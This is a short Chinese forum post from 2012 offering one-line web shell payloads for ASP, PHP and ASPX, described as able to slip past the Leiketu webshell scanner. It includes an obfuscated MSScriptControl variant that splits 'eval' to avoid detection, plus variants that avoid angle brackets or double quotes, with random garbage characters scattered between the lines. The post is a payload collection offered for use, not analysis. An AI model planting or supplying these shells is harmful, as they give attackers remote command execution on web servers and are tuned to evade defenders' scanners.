找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2278|回复: 0
打印 上一主题 下一主题

过雷克图一句话木马

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-23 14:36:09 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
asp一句话  <%execute(request("1"))%>  
* S' k$ ]& C( x9 s( Y6 l7 K! h% r- ?8 ]
php一句话  <?php eval($_POST[1]);?>  . g/ I' I8 G4 r0 @4 b
% h/ h& d+ Y4 P6 F" k( X: Y) J  R
aspx一句话
0 C$ ]% {, ?& S' w+ W; L6 q% K: r- s
<script language="C#" runat="server">  ~9 S# ?% \1 q# I0 u- K5 Q

9 n# _, w- `  @" ?4 H. p8 i% yWebAdmin2Y.x.y aaaaa = new  WebAdmin2Y.x.y   ("add6bb58e139be10");
: R+ ^9 O5 ^6 {9 V1 a# A. n1 s9 i( T" X3 g2 m- |
</script># w5 s: Q! G7 }( X- t3 I1 m3 V4 r
( M2 E9 ~4 s. V; w
可以躲过雷客图的一句话。8 _: e! _5 G7 U7 O7 ^- W
3 }9 f- L6 y5 J% J8 `" _5 Q
  <%# Z9 q5 s; T9 a( c. k, E5 c( _

- r( M% d, M9 Z- v$ s' x  set ms = server.CreateObject("MSScriptControl.ScriptControl.1")
. V. u# t0 B) a$ D8 I
# C/ k) z" K: I  ms.Language="VBScript"
6 l3 a& p( x9 f' l2 G: l: T, l4 ]- c  l
  ms.AddObject "Response", Response
# t, L$ p0 _3 L4 {' n, P' D0 y
% \* s4 m1 N' \) e& `: R: @  ms.AddObject "request", request
( c% h; [! n( I1 j$ u; z3 b8 |4 X0 z4 D. x6 `/ a/ x
  ms.ExecuteStatement("ev"&"al(request(""1""))")
6 Y4 x8 @& p; c
8 E3 p' A* Y6 S6 G- _! A6 B  %>
7 @6 l. m7 w5 V; l9 `. N% H" r# _8 `3 O0 m6 R
  不用'<,>'的asp一句话! w* s& s) @3 Y6 K$ Q

* U8 p4 B. C* y, J  <script language=VBScript runat=server>execute request("1")</script>
& O% Z( J  p' J5 g
: X; d0 q5 n. n# `& v  不用双引号的一句话。# M3 ]9 ~) Z0 n6 S3 r
% {8 h0 P% v6 K! d) |0 t5 ~
  <%eval request(chr(35))%>
4 U' f) x" z/ D. S! v; f6 t
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表